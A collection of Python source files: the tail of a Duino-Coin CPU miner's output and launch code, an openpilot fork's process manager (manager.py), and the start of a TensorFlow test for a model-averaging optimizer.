+ "s"
+ Style.NORMAL
+ " ∙ "
+ Fore.BLUE
+ Style.BRIGHT
+ str(formattedhashcount)
+ Fore.RESET
+ Style.NORMAL
+ " ⚙ diff "
+ str(diff)
+ " ∙ "
+ Fore.CYAN
+ "ping "
+ str("%02.0f" % int(ping))
+ "ms")
elif feedback == "BLOCK":
# If block was found
accepted.value += 1
title(
getString("duco_python_miner")
+ str(MINER_VER)
+ ") - "
+ str(accepted.value)
+ "/"
+ str(accepted.value + rejected.value)
+ getString("accepted_shares"))
with thread_lock:
print(
Style.RESET_ALL
+ Fore.WHITE
+ now().strftime(Style.DIM + "%H:%M:%S ")
+ Style.BRIGHT
+ algo_back_color
+ Fore.RESET
+ " cpu"
+ str(threadid)
+ " "
+ Back.RESET
+ Fore.CYAN
+ " ⛏"
+ getString("block_found")
+ Fore.RESET
+ str(accepted.value)
+ "/"
+ str(accepted.value + rejected.value)
+ Fore.YELLOW
+ " ("
+ str(int(
(accepted.value
/ (accepted.value + rejected.value)
* 100)))
+ "%)"
+ Style.NORMAL
+ Fore.RESET
+ " ∙ "
+ str("%05.2f" % float(computetime))
+ "s"
+ Style.NORMAL
+ " ∙ "
+ Fore.BLUE
+ Style.BRIGHT
+ str(formattedhashcount)
+ Fore.RESET
+ Style.NORMAL
+ " ⚙ diff "
+ str(diff)
+ " ∙ "
+ Fore.CYAN
+ "ping "
+ str("%02.0f" % int(ping))
+ "ms")
else:
# If result was incorrect
rejected.value += 1
title(
getString("duco_python_miner")
+ str(MINER_VER)
+ ") - "
+ str(accepted.value)
+ "/"
+ str(accepted.value + rejected.value)
+ getString("accepted_shares"))
with thread_lock:
print(
Style.RESET_ALL
+ Fore.WHITE
+ now().strftime(Style.DIM + "%H:%M:%S ")
+ Style.BRIGHT
+ algo_back_color
+ Fore.RESET
+ " cpu"
+ str(threadid)
+ " "
+ Style.BRIGHT
+ Back.RESET
+ Fore.RED
+ " ✗"
+ getString("rejected")
+ Fore.RESET
+ str(accepted.value)
+ "/"
+ str(accepted.value + rejected.value)
+ Fore.YELLOW
+ " ("
+ str(int(
(accepted.value
/ (accepted.value + rejected.value)
* 100)))
+ "%)"
+ Style.NORMAL
+ Fore.RESET
+ " ∙ "
+ str("%05.2f" % float(computetime))
+ "s"
+ Style.NORMAL
+ " ∙ "
+ Fore.BLUE
+ Style.BRIGHT
+ str(formattedhashcount)
+ Fore.RESET
+ Style.NORMAL
+ " ⚙ diff "
+ str(diff)
+ " ∙ "
+ Fore.CYAN
+ "ping "
+ str("%02.0f" % int(ping))
+ "ms")
end_time = time()
elapsed_time = end_time - start_time
if (threadid == 0
and elapsed_time >= PERIODIC_REPORT_TIME):
report_shares = accepted.value - report_shares
uptime = calculate_uptime(mining_start_time)
periodic_report(start_time,
end_time,
report_shares,
totalhashrate,
uptime)
start_time = time()
break
break
except Exception as e:
pretty_print(
"net"
+ str(threadid),
getString("error_while_mining")
+ Style.NORMAL
+ Fore.RESET
+ " (mining err: "
+ str(e)
+ ")",
"error")
debug_output("Error while mining: " + str(e))
sleep(5)
break
def periodic_report(start_time,
end_time,
shares,
hashrate,
uptime):
seconds = round(end_time - start_time)
pretty_print("sys0",
" Periodic mining report (BETA): "
+ Fore.RESET
+ Style.NORMAL
+ "\n\t\t‖ During the last "
+ str(seconds)
+ " seconds"
+ "\n\t\t‖ You've mined "
+ str(shares)
+ " shares ("
+ str(round(shares/seconds, 1))
+ " shares/s)"
+ "\n\t\t‖ With the hashrate of "
+ str(int(hashrate)) + " kH/s"
+ "\n\t\t‖ In this time period, you've solved "
+ str(int(hashrate*seconds))
+ " hashes"
+ "\n\t\t‖ Total miner uptime: "
+ str(uptime), "success")
def pretty_print(message_type, message, state):
# Prints colored output messages
# Usb/net/sys background
if message_type.startswith("net"):
background = Back.BLUE
elif message_type.startswith("cpu"):
background = Back.YELLOW
if message_type.startswith("sys"):
background = Back.GREEN
# Text color
if state == "success":
color = Fore.GREEN
elif state == "warning":
color = Fore.YELLOW
else:
color = Fore.RED
with thread_lock:
print(Style.RESET_ALL
+ Fore.WHITE
+ now().strftime(Style.DIM + "%H:%M:%S ")
+ Style.BRIGHT
+ background
+ " "
+ message_type
+ " "
+ Back.RESET
+ color
+ Style.BRIGHT
+ message
+ Style.NORMAL
+ Fore.RESET)
def initRichPresence():
# Initialize Discord rich presence
global RPC
try:
RPC = Presence(808045598447632384)
RPC.connect()
debug_output("Discord rich presence initialized")
except Exception as e:
# Discord not launched
debug_output("Error launching Discord RPC thread: " + str(e))
def updateRichPresence():
# Update rich presence status
startTime = int(time())
while True:
try:
# Calculate average total hashrate with prefix
totalhashrate = mean(totalhashrate_mean[-20:])
if totalhashrate > 800:
totalhashrate = str(round(totalhashrate / 1000, 2)) + " MH/s"
else:
totalhashrate = str(round(totalhashrate, 1)) + " kH/s"
RPC.update(
details="Hashrate: " + str(totalhashrate),
start=startTime,
state="Acc. shares: "
+ str(accepted.value)
+ "/"
+ str(rejected.value + accepted.value),
large_image="ducol",
large_text="Duino-Coin, "
+ "a coin that can be mined with almost everything, "
+ "including AVR boards",
buttons=[
{"label": "Learn more",
"url": "https://duinocoin.com"},
{"label": "Discord Server",
"url": "https://discord.gg/k48Ht5y"}])
debug_output("Rich presence updated")
except Exception as e:
# Discord not launched
debug_output("Error launching Discord RPC thread: " + str(e))
sleep(15) # 15 seconds to respect Discord rate limit
def get_fastest_connection(server_ip: str):
connection_pool = []
available_connections = []
for i in range(len(AVAILABLE_PORTS)):
connection_pool.append(socket())
connection_pool[i].setblocking(0)
try:
connection_pool[i].connect((server_ip,
AVAILABLE_PORTS[i]))
connection_pool[i].settimeout(SOC_TIMEOUT)
except BlockingIOError as e:
pass
ready_connections, _, __ = select.select(connection_pool, [], [])
while True:
for connection in ready_connections:
try:
server_version = connection.recv(5).decode()
except:
continue
if server_version == b'':
continue
available_connections.append(connection)
connection.send(b'PING')
ready_connections, _, __ = select.select(available_connections, [], [])
ready_connections[0].recv(4)
return ready_connections[0].getpeername()[1]
def fetch_pools():
while True:
pretty_print("net0",
" "
+ getString("connection_search")
+ "...",
"warning")
try:
response = requests.get(
"https://server.duinocoin.com/getPool"
).json()
pretty_print("net0",
" Retrieved mining node: "
+ Fore.RESET
+ Style.NORMAL
+ str(response["name"]),
"success")
NODE_ADDRESS = response["ip"]
NODE_PORT = response["port"]
return NODE_ADDRESS, NODE_PORT
except Exception as e:
pretty_print("net0",
" Error retrieving mining node: "
+ str(e)
+ ", retrying in 15s",
"error")
sleep(15)
if __name__ == "__main__":
from multiprocessing import freeze_support
freeze_support()
cpu = cpuinfo.get_cpu_info()
title(getString("duco_python_miner") + str(MINER_VER) + ")")
if osname == "nt":
# Unicode fix for windows
ossystem("chcp 65001")
# Colorama
init(autoreset=True)
try:
from multiprocessing import (
Manager,
Process,
Value,
cpu_count,
current_process
)
manager = Manager()
# Multiprocessing globals
khashcount = Value("i", 0)
accepted = Value("i", 0)
rejected = Value("i", 0)
hashrates_list = manager.dict()
totalhashrate_mean = manager.list()
except Exception as e:
print(e)
pretty_print(
"sys0",
" Multiprocessing is not available. "
+ "Please check permissions and/or your python installation. "
+ "Exiting in 10s.",
"error")
sleep(10)
_exit(1)
try:
# Load config file or create new one
loadConfig()
debug_output("Config file loaded")
except Exception as e:
pretty_print(
"sys0",
getString("load_config_error")
+ RESOURCES_DIR
+ getString("load_config_error_warning")
+ Style.NORMAL
+ Fore.RESET
+ " (config load err: "
+ str(e)
+ ")",
"error")
debug_output("Error reading configfile: " + str(e))
sleep(10)
_exit(1)
try:
# Display greeting message
Greeting()
debug_output("Greeting displayed")
except Exception as e:
pretty_print(
"sys0",
"Error displaying greeting message"
+ Style.NORMAL
+ Fore.RESET
+ " (greeting err: "
+ str(e)
+ ")",
"error")
debug_output("Error displaying greeting message: " + str(e))
try:
NODE_ADDRESS, NODE_PORT = fetch_pools()
except:
NODE_ADDRESS = "server.duinocoin.com"
NODE_PORT = 2813
debug_output("Using default server port and address")
try:
for x in range(int(threadcount)):
# Launch duco mining threads
thread.append(x)
thread[x] = Process(
target=Thread,
args=(
x,
accepted,
rejected,
requested_diff,
khashcount,
username,
efficiency,
rig_identiier,
algorithm,
hashrates_list,
totalhashrate_mean,
NODE_ADDRESS,
NODE_PORT))
thread[x].start()
if x > 4 and x % 4 == 0:
# Don't launch burst of threads
# to not get banned
sleep(5)
else:
sleep(0.1)
except Exception as e:
pretty_print(
"sys0",
"Error launching CPU thread(s)"
+ Style.NORMAL
+ Fore.RESET
+ " (cpu launch err: "
+ str(e)
+ ")",
"error")
debug_output("Error launching CPU thead(s): " + str(e))
if discord_presence == "y":
try:
# Discord rich presence threads
initRichPresence()
thrThread(
target=updateRichPresence).start()
except Exception as e:
debug_output("Error launching Discord RPC thead: " + str(e))
|
manager.py
|
#!/usr/bin/env python3
import os
import time
import sys
import fcntl
import errno
import signal
import shutil
import subprocess
import datetime
import textwrap
from typing import Dict, List
from selfdrive.swaglog import cloudlog, add_logentries_handler
from common.basedir import BASEDIR
from common.hardware import HARDWARE, ANDROID, PC
WEBCAM = os.getenv("WEBCAM") is not None
sys.path.append(os.path.join(BASEDIR, "pyextra"))
os.environ['BASEDIR'] = BASEDIR
TOTAL_SCONS_NODES = 1040
prebuilt = os.path.exists(os.path.join(BASEDIR, 'prebuilt'))
# Create folders needed for msgq
try:
os.mkdir("/dev/shm")
except FileExistsError:
pass
except PermissionError:
print("WARNING: failed to make /dev/shm")
if ANDROID:
os.chmod("/dev/shm", 0o777)
def unblock_stdout():
# get a non-blocking stdout
child_pid, child_pty = os.forkpty()
if child_pid != 0: # parent
# child is in its own process group, manually pass kill signals
signal.signal(signal.SIGINT, lambda signum, frame: os.kill(child_pid, signal.SIGINT))
signal.signal(signal.SIGTERM, lambda signum, frame: os.kill(child_pid, signal.SIGTERM))
fcntl.fcntl(sys.stdout, fcntl.F_SETFL,
fcntl.fcntl(sys.stdout, fcntl.F_GETFL) | os.O_NONBLOCK)
while True:
try:
dat = os.read(child_pty, 4096)
except OSError as e:
if e.errno == errno.EIO:
break
continue
if not dat:
break
try:
sys.stdout.write(dat.decode('utf8'))
except (OSError, IOError, UnicodeDecodeError):
pass
# os.wait() returns a tuple with the pid and a 16 bit value
# whose low byte is the signal number and whose high byte is the exit satus
exit_status = os.wait()[1] >> 8
os._exit(exit_status)
if __name__ == "__main__":
unblock_stdout()
from common.spinner import Spinner
from common.text_window import TextWindow
import importlib
import traceback
from multiprocessing import Process
# Run scons
spinner = Spinner(noop=(__name__ != "__main__" or not ANDROID))
spinner.update("0")
if not prebuilt:
for retry in [True, False]:
# run scons
env = os.environ.copy()
env['SCONS_PROGRESS'] = "1"
env['SCONS_CACHE'] = "1"
nproc = os.cpu_count()
j_flag = "" if nproc is None else "-j%d" % (nproc - 1)
scons = subprocess.Popen(["scons", j_flag], cwd=BASEDIR, env=env, stderr=subprocess.PIPE)
compile_output = []
# Read progress from stderr and update spinner
while scons.poll() is None:
try:
line = scons.stderr.readline() # type: ignore
if line is None:
continue
line = line.rstrip()
prefix = b'progress: '
if line.startswith(prefix):
i = int(line[len(prefix):])
if spinner is not None:
spinner.update("%d" % (70.0 * (i / TOTAL_SCONS_NODES)))
elif len(line):
compile_output.append(line)
print(line.decode('utf8', 'replace'))
except Exception:
pass
if scons.returncode != 0:
# Read remaining output
r = scons.stderr.read().split(b'\n') # type: ignore
compile_output += r
if retry:
if not os.getenv("CI"):
print("scons build failed, cleaning in")
for i in range(3, -1, -1):
print("....%d" % i)
time.sleep(1)
subprocess.check_call(["scons", "-c"], cwd=BASEDIR, env=env)
shutil.rmtree("/tmp/scons_cache")
else:
print("scons build failed after retry")
sys.exit(1)
else:
# Build failed log errors
errors = [line.decode('utf8', 'replace') for line in compile_output
if any([err in line for err in [b'error: ', b'not found, needed by target']])]
error_s = "\n".join(errors)
add_logentries_handler(cloudlog)
cloudlog.error("scons build failed\n" + error_s)
# Show TextWindow
no_ui = __name__ != "__main__" or not ANDROID
error_s = "\n \n".join(["\n".join(textwrap.wrap(e, 65)) for e in errors])
with TextWindow("openpilot failed to build\n \n" + error_s, noop=no_ui) as t:
t.wait_for_exit()
exit(1)
else:
break
import cereal
import cereal.messaging as messaging
from common.params import Params
import selfdrive.crash as crash
from selfdrive.registration import register
from selfdrive.version import version, dirty
from selfdrive.loggerd.config import ROOT
from selfdrive.launcher import launcher
from common.apk import update_apks, pm_apply_packages, start_offroad
ThermalStatus = cereal.log.ThermalData.ThermalStatus
# comment out anything you don't want to run
managed_processes = {
"thermald": "selfdrive.thermald.thermald",
"uploader": "selfdrive.loggerd.uploader",
"deleter": "selfdrive.loggerd.deleter",
"controlsd": "selfdrive.controls.controlsd",
"plannerd": "selfdrive.controls.plannerd",
"radard": "selfdrive.controls.radard",
"dmonitoringd": "selfdrive.monitoring.dmonitoringd",
"ubloxd": ("selfdrive/locationd", ["./ubloxd"]),
"loggerd": ("selfdrive/loggerd", ["./loggerd"]),
"logmessaged": "selfdrive.logmessaged",
"locationd": "selfdrive.locationd.locationd",
"tombstoned": "selfdrive.tombstoned",
"logcatd": ("selfdrive/logcatd", ["./logcatd"]),
"proclogd": ("selfdrive/proclogd", ["./proclogd"]),
"boardd": ("selfdrive/boardd", ["./boardd"]), # not used directly
"pandad": "selfdrive.pandad",
"ui": ("selfdrive/ui", ["./ui"]),
"calibrationd": "selfdrive.locationd.calibrationd",
"paramsd": "selfdrive.locationd.paramsd",
"camerad": ("selfdrive/camerad", ["./camerad"]),
"sensord": ("selfdrive/sensord", ["./sensord"]),
"clocksd": ("selfdrive/clocksd", ["./clocksd"]),
"gpsd": ("selfdrive/sensord", ["./gpsd"]),
"updated": "selfdrive.updated",
"dmonitoringmodeld": ("selfdrive/modeld", ["./dmonitoringmodeld"]),
"modeld": ("selfdrive/modeld", ["./modeld"]),
"rtshield": "selfdrive.rtshield",
}
daemon_processes = {
"manage_athenad": ("selfdrive.athena.manage_athenad", "AthenadPid"),
}
running: Dict[str, Process] = {}
def get_running():
return running
# due to qualcomm kernel bugs SIGKILLing camerad sometimes causes page table corruption
unkillable_processes = ['camerad']
# processes to end with SIGINT instead of SIGTERM
interrupt_processes: List[str] = []
# processes to end with SIGKILL instead of SIGTERM
kill_processes = ['sensord']
persistent_processes = [
'thermald',
'logmessaged',
'ui',
'uploader',
'deleter',
]
if not PC:
persistent_processes += [
'updated',
'logcatd',
'tombstoned',
'sensord',
]
car_started_processes = [
'controlsd',
'plannerd',
'loggerd',
'radard',
'calibrationd',
'paramsd',
'camerad',
'proclogd',
'locationd',
'clocksd',
]
driver_view_processes = [
'camerad',
'dmonitoringd',
'dmonitoringmodeld'
]
if WEBCAM:
car_started_processes += [
'dmonitoringd',
'dmonitoringmodeld',
]
if not PC:
car_started_processes += [
'ubloxd',
'dmonitoringd',
'dmonitoringmodeld',
]
if ANDROID:
car_started_processes += [
'gpsd',
'rtshield',
]
# starting dmonitoringmodeld when modeld is initializing can sometimes \
# result in a weird snpe state where dmon constantly uses more cpu than normal.
car_started_processes += ['modeld']
def register_managed_process(name, desc, car_started=False):
global managed_processes, car_started_processes, persistent_processes
print("registering %s" % name)
managed_processes[name] = desc
if car_started:
car_started_processes.append(name)
else:
persistent_processes.append(name)
# ****************** process management functions ******************
def nativelauncher(pargs, cwd):
# exec the process
os.chdir(cwd)
# because when extracted from pex zips permissions get lost -_-
os.chmod(pargs[0], 0o700)
os.execvp(pargs[0], pargs)
def start_managed_process(name):
if name in running or name not in managed_processes:
return
proc = managed_processes[name]
if isinstance(proc, str):
cloudlog.info("starting python %s" % proc)
running[name] = Process(name=name, target=launcher, args=(proc,))
else:
pdir, pargs = proc
cwd = os.path.join(BASEDIR, pdir)
cloudlog.info("starting process %s" % name)
running[name] = Process(name=name, target=nativelauncher, args=(pargs, cwd))
running[name].start()
def start_daemon_process(name):
params = Params()
proc, pid_param = daemon_processes[name]
pid = params.get(pid_param, encoding='utf-8')
if pid is not None:
try:
os.kill(int(pid), 0)
with open(f'/proc/{pid}/cmdline') as f:
if proc in f.read():
# daemon is running
return
except (OSError, FileNotFoundError):
# process is dead
pass
cloudlog.info("starting daemon %s" % name)
proc = subprocess.Popen(['python', '-m', proc], # pylint: disable=subprocess-popen-preexec-fn
stdin=open('/dev/null', 'r'),
stdout=open('/dev/null', 'w'),
stderr=open('/dev/null', 'w'),
preexec_fn=os.setpgrp)
params.put(pid_param, str(proc.pid))
def prepare_managed_process(p):
proc = managed_processes[p]
if isinstance(proc, str):
# import this python
cloudlog.info("preimporting %s" % proc)
importlib.import_module(proc)
elif os.path.isfile(os.path.join(BASEDIR, proc[0], "Makefile")):
# build this process
cloudlog.info("building %s" % (proc,))
try:
subprocess.check_call(["make", "-j4"], cwd=os.path.join(BASEDIR, proc[0]))
except subprocess.CalledProcessError:
# make clean if the build failed
cloudlog.warning("building %s failed, make clean" % (proc, ))
subprocess.check_call(["make", "clean"], cwd=os.path.join(BASEDIR, proc[0]))
subprocess.check_call(["make", "-j4"], cwd=os.path.join(BASEDIR, proc[0]))
def join_process(process, timeout):
# Process().join(timeout) will hang due to a python 3 bug: https://bugs.python.org/issue28382
# We have to poll the exitcode instead
t = time.time()
while time.time() - t < timeout and process.exitcode is None:
time.sleep(0.001)
def kill_managed_process(name):
if name not in running or name not in managed_processes:
return
cloudlog.info("killing %s" % name)
if running[name].exitcode is None:
if name in interrupt_processes:
os.kill(running[name].pid, signal.SIGINT)
elif name in kill_processes:
os.kill(running[name].pid, signal.SIGKILL)
else:
running[name].terminate()
join_process(running[name], 5)
if running[name].exitcode is None:
if name in unkillable_processes:
cloudlog.critical("unkillable process %s failed to exit! rebooting in 15 if it doesn't die" % name)
join_process(running[name], 15)
if running[name].exitcode is None:
cloudlog.critical("unkillable process %s failed to die!" % name)
# TODO: Use method from HARDWARE
if ANDROID:
cloudlog.critical("FORCE REBOOTING PHONE!")
os.system("date >> /sdcard/unkillable_reboot")
os.system("reboot")
raise RuntimeError
else:
cloudlog.info("killing %s with SIGKILL" % name)
os.kill(running[name].pid, signal.SIGKILL)
running[name].join()
cloudlog.info("%s is dead with %d" % (name, running[name].exitcode))
del running[name]
def cleanup_all_processes(signal, frame):
cloudlog.info("caught ctrl-c %s %s" % (signal, frame))
if ANDROID:
pm_apply_packages('disable')
for name in list(running.keys()):
kill_managed_process(name)
cloudlog.info("everything is dead")
def send_managed_process_signal(name, sig):
if name not in running or name not in managed_processes:
return
cloudlog.info(f"sending signal {sig} to {name}")
os.kill(running[name].pid, sig)
# ****************** run loop ******************
def manager_init(should_register=True):
if should_register:
reg_res = register()
if reg_res:
dongle_id = reg_res
else:
raise Exception("server registration failed")
else:
dongle_id = "c"*16
# set dongle id
cloudlog.info("dongle id is " + dongle_id)
os.environ['DONGLE_ID'] = dongle_id
cloudlog.info("dirty is %d" % dirty)
if not dirty:
os.environ['CLEAN'] = '1'
cloudlog.bind_global(dongle_id=dongle_id, version=version, dirty=dirty, is_eon=True)
crash.bind_user(id=dongle_id)
crash.bind_extra(version=version, dirty=dirty, is_eon=True)
os.umask(0)
try:
os.mkdir(ROOT, 0o777)
except OSError:
pass
# ensure shared libraries are readable by apks
if ANDROID:
os.chmod(BASEDIR, 0o755)
os.chmod(os.path.join(BASEDIR, "cereal"), 0o755)
os.chmod(os.path.join(BASEDIR, "cereal", "libmessaging_shared.so"), 0o755)
def manager_thread():
# now loop
thermal_sock = messaging.sub_sock('thermal')
cloudlog.info("manager start")
cloudlog.info({"environ": os.environ})
params = Params()
EnableLogger = int(params.get('OpkrEnableLogger'))
if not EnableLogger:
car_started_processes.remove( 'loggerd' )
persistent_processes.remove( 'logmessaged' )
persistent_processes.remove( 'uploader' )
persistent_processes.remove( 'logcatd' )
persistent_processes.remove( 'updated' )
persistent_processes.remove( 'deleter' )
persistent_processes.remove( 'tombstoned' )
else:
# save boot log
subprocess.call(["./loggerd", "--bootlog"], cwd=os.path.join(BASEDIR, "selfdrive/loggerd"))
# start daemon processes
for p in daemon_processes:
start_daemon_process(p)
# start persistent processes
for p in persistent_processes:
start_managed_process(p)
# start offroad
if ANDROID:
pm_apply_packages('enable')
start_offroad()
if os.getenv("NOBOARD") is None:
start_managed_process("pandad")
if os.getenv("BLOCK") is not None:
for k in os.getenv("BLOCK").split(","):
del managed_processes[k]
started_prev = False
logger_dead = False
while 1:
msg = messaging.recv_sock(thermal_sock, wait=True)
if msg.thermal.freeSpace < 0.05:
logger_dead = True
if msg.thermal.started:
for p in car_started_processes:
if p == "loggerd" and logger_dead:
kill_managed_process(p)
else:
start_managed_process(p)
else:
logger_dead = False
driver_view = params.get("IsDriverViewEnabled") == b"1"
# TODO: refactor how manager manages processes
for p in reversed(car_started_processes):
if p not in driver_view_processes or not driver_view:
kill_managed_process(p)
for p in driver_view_processes:
if driver_view:
start_managed_process(p)
else:
kill_managed_process(p)
# trigger an update after going offroad
if started_prev:
send_managed_process_signal("updated", signal.SIGHUP)
started_prev = msg.thermal.started
# check the status of all processes, did any of them die?
running_list = ["%s%s\u001b[0m" % ("\u001b[32m" if running[p].is_alive() else "\u001b[31m", p) for p in running]
cloudlog.debug(' '.join(running_list))
# Exit main loop when uninstall is needed
if params.get("DoUninstall", encoding='utf8') == "1":
break
def manager_prepare(spinner=None):
# build all processes
os.chdir(os.path.dirname(os.path.abspath(__file__)))
# Spinner has to start from 70 here
total = 100.0 if prebuilt else 30.0
for i, p in enumerate(managed_processes):
if spinner is not None:
spinner.update("%d" % ((100.0 - total) + total * (i + 1) / len(managed_processes),))
prepare_managed_process(p)
def uninstall():
cloudlog.warning("uninstalling")
with open('/cache/recovery/command', 'w') as f:
f.write('--wipe_data\n')
# IPowerManager.reboot(confirm=false, reason="recovery", wait=true)
HARDWARE.reboot(reason="recovery")
def main():
if ANDROID:
# the flippening!
os.system('LD_LIBRARY_PATH="" content insert --uri content://settings/system --bind name:s:user_rotation --bind value:i:1')
# disable bluetooth
os.system('service call bluetooth_manager 8')
params = Params()
params.manager_start()
default_params = [
("CommunityFeaturesToggle", "0"),
("CompletedTrainingVersion", "0"),
("IsRHD", "0"),
("IsMetric", "1"),
("RecordFront", "0"),
("HasAcceptedTerms", "0"),
("HasCompletedSetup", "0"),
("IsUploadRawEnabled", "1"),
("IsLdwEnabled", "1"),
("LastUpdateTime", datetime.datetime.utcnow().isoformat().encode('utf8')),
("OpenpilotEnabledToggle", "1"),
("LaneChangeEnabled", "1"),
("IsDriverViewEnabled", "0"),
("IsOpenpilotViewEnabled", "0"),
("OpkrAutoShutdown", "2"),
("OpkrAutoScreenOff", "0"),
("OpkrUIBrightness", "0"),
("OpkrEnableDriverMonitoring", "1"),
("OpkrEnableLogger", "0"),
("OpkrEnableGetoffAlert", "1"),
("OpkrAutoResume", "1"),
("OpkrVariableCruise", "0"),
("OpkrLaneChangeSpeed", "60"),
("OpkrAutoLaneChangeDelay", "0"),
("OpkrSteerAngleCorrection", "0"),
("PutPrebuiltOn", "0"),
("FingerprintIssuedFix", "0"),
("LdwsCarFix", "0"),
("LateralControlMethod", "0"),
("CruiseStatemodeSelInit", "1"),
("InnerLoopGain", "30"),
("OuterLoopGain", "20"),
("TimeConstant", "10"),
("ActuatorEffectiveness", "15"),
("Scale", "1750"),
("LqrKi", "10"),
("DcGain", "30"),
("IgnoreZone", "0"),
("PidKp", "20"),
("PidKi", "40"),
("PidKf", "5"),
("CameraOffsetAdj", "60"),
("SteerRatioAdj", "135"),
("SteerActuatorDelayAdj", "30"),
("SteerRateCostAdj", "50"),
("SteerLimitTimerAdj", "80"),
("TireStiffnessFactorAdj", "75"),
("SteerMaxAdj", "380"),
("SteerDeltaUpAdj", "3"),
("SteerDeltaDownAdj", "7"),
("SteerMaxvAdj", "10"),
("OpkrBatteryChargingControl", "1"),
("OpkrBatteryChargingMin", "70"),
("OpkrBatteryChargingMax", "80"),
("OpkrUiOpen", "0"),
("OpkrDriveOpen", "0"),
("OpkrTuneOpen", "0"),
("OpkrControlOpen", "0"),
("LeftCurvOffsetAdj", "0"),
("RightCurvOffsetAdj", "0"),
("DebugUi1", "0"),
("DebugUi2", "0"),
("OpkrBlindSpotDetect", "0"),
("OpkrMaxAngleLimit", "90"),
]
# set unset params
for k, v in default_params:
if params.get(k) is None:
params.put(k, v)
# is this chffrplus?
if os.getenv("PASSIVE") is not None:
params.put("Passive", str(int(os.getenv("PASSIVE"))))
if params.get("Passive") is None:
raise Exception("Passive must be set to continue")
if ANDROID:
update_apks()
manager_init()
manager_prepare(spinner)
spinner.close()
if os.getenv("PREPAREONLY") is not None:
return
# SystemExit on sigterm
signal.signal(signal.SIGTERM, lambda signum, frame: sys.exit(1))
try:
manager_thread()
except Exception:
traceback.print_exc()
crash.capture_exception()
finally:
cleanup_all_processes(None, None)
if params.get("DoUninstall", encoding='utf8') == "1":
uninstall()
if __name__ == "__main__":
try:
main()
except Exception:
add_logentries_handler(cloudlog)
cloudlog.exception("Manager failed to start")
# Show last 3 lines of traceback
error = traceback.format_exc(-3)
error = "Manager failed to start\n \n" + error
with TextWindow(error) as t:
t.wait_for_exit()
raise
# manual exit because we are forked
sys.exit(0)
|
test_model_avg_opt.py
|
"""Tests for ModelAverageOptimizer."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import portpicker
import tensorflow as tf
from tefla.core.optimizer import ModelAverageOptimizer, ModelAverageCustomGetter, GLOBAL_VARIABLE_NAME
def create_local_cluster(num_workers, num_ps, protocol="grpc"):
"""Create local GRPC servers and return them."""
worker_ports = [portpicker.pick_unused_port() for _ in range(num_workers)]
ps_ports = [portpicker.pick_unused_port() for _ in range(num_ps)]
cluster_dict = {
"worker": ["localhost:%s" % port for port in worker_ports],
"ps": ["localhost:%s" % port for port in ps_ports]
}
cs = tf.train.ClusterSpec(cluster_dict)
workers = [
tf.train.Server(cs, job_name="worker", protocol=protocol, task_index=ix, start=True)
for ix in range(num_workers)
]
ps_servers = [
tf.train.Server(cs, job_name="ps", protocol=protocol, task_index=ix, start=True)
for ix in range(num_ps)
]
return cluster_dict, workers, ps_servers
# Creates the workers and return their sessions, graphs, train_ops.
# Cheif worker will update at last
def _get_workers(num_workers, steps, workers):
sessions = []
graphs = []
train_ops = []
for worker_id in range(num_workers):
graph = tf.Graph()
is_chief = (worker_id == 0)
with graph.as_default():
worker_device = "/job:worker/task:%d/cpu:0" % (worker_id)
ma_coustom = ModelAverageCustomGetter(worker_device=worker_device)
with tf.variable_scope(
'', custom_getter=ma_coustom), tf.device(
tf.train.replica_device_setter(
worker_device=worker_device, ps_device="/job:ps/task:0/cpu:0", ps_tasks=1)):
global_step = tf.Variable(0, name='global_step', trainable=False)
var_0 = tf.get_variable(initializer=0.0, name="v0")
var_1 = tf.get_variable(initializer=1.0, name="v1")
with tf.device("/job:worker/task:" + str(worker_id)):
if worker_id == 0:
grads_0 = tf.constant(-1.0)
grads_1 = tf.constant(-1.0)
else:
grads_0 = tf.constant(-2.0)
grads_1 = tf.constant(-2.0)
sgd_opt = tf.train.GradientDescentOptimizer(1.0)
opt = ModelAverageOptimizer(
opt=sgd_opt,
num_worker=num_workers,
ma_custom_getter=ma_coustom,
is_chief=is_chief,
interval_steps=steps)
train_op = [opt.apply_gradients([[grads_0, var_0], [grads_1, var_1]], global_step)]
easgd_hook = opt.make_session_run_hook()
# Creates MonitoredSession
sess = tf.train.MonitoredTrainingSession(workers[worker_id].target, hooks=[easgd_hook])
sessions.append(sess)
graphs.append(graph)
train_ops.append(train_op)
return sessions, graphs, train_ops
class ModelAverageOptimizerTest(tf.test.TestCase):
def _run(self, train_op, sess):
sess.run(train_op)
def test1Workers2Period(self):
num_workers = 2
steps = 2
num_ps = 1
cluster, workers, _ = create_local_cluster(num_workers=num_workers, num_ps=num_ps)
sessions, graphs, train_ops = _get_workers(num_workers, steps, workers)
var_0 = graphs[0].get_tensor_by_name('v0:0')
var_1 = graphs[0].get_tensor_by_name('v1:0')
global_step = tf.train.get_global_step(graphs[0])
global_var_0 = graphs[0].get_tensor_by_name(GLOBAL_VARIABLE_NAME + "/v0:0")
global_var_1 = graphs[0].get_tensor_by_name(GLOBAL_VARIABLE_NAME + "/v1:0")
# Verify the initialized value.
self.assertAllEqual(0.0, sessions[0].run(var_0))
self.assertAllEqual(1.0, sessions[0].run(var_1))
self.assertAllEqual(0.0, sessions[0].run(global_var_0))
self.assertAllEqual(1.0, sessions[0].run(global_var_1))
self.assertAllEqual(0, sessions[0].run(global_step))
sessions[0].run(train_ops[0])
sessions[1].run(train_ops[1])
self.assertAllEqual(1.0, sessions[0].run(var_0))
self.assertAllEqual(2.0, sessions[0].run(var_1))
self.assertAllEqual(0.0, sessions[0].run(global_var_0))
self.assertAllEqual(1.0, sessions[0].run(global_var_1))
self.assertAllEqual(0, sessions[0].run(global_step))
# iteration 2, global varibale update
thread_0 = self.checkedThread(target=self._run, args=(train_ops[0], sessions[0]))
thread_1 = self.checkedThread(target=self._run, args=(train_ops[1], sessions[1]))
thread_0.start()
thread_1.start()
thread_0.join()
thread_1.join()
self.assertAllEqual(3.0, sessions[0].run(var_0))
self.assertAllEqual(4.0, sessions[0].run(var_1))
self.assertAllEqual(3.0, sessions[0].run(global_var_0))
self.assertAllEqual(4.0, sessions[0].run(global_var_1))
self.assertAllEqual(1, sessions[0].run(global_step))
# iteration 3
sessions[0].run(train_ops[0])
self.assertAllEqual(4.0, sessions[0].run(var_0))
self.assertAllEqual(5.0, sessions[0].run(var_1))
self.assertAllEqual(3.0, sessions[0].run(global_var_0))
self.assertAllEqual(4.0, sessions[0].run(global_var_1))
self.assertAllEqual(1, sessions[0].run(global_step))
def testPS2TasksWithClusterSpecClass(self):
cluster_spec = tf.train.ClusterSpec({
"ps": ["ps0:2222", "ps1:2222"],
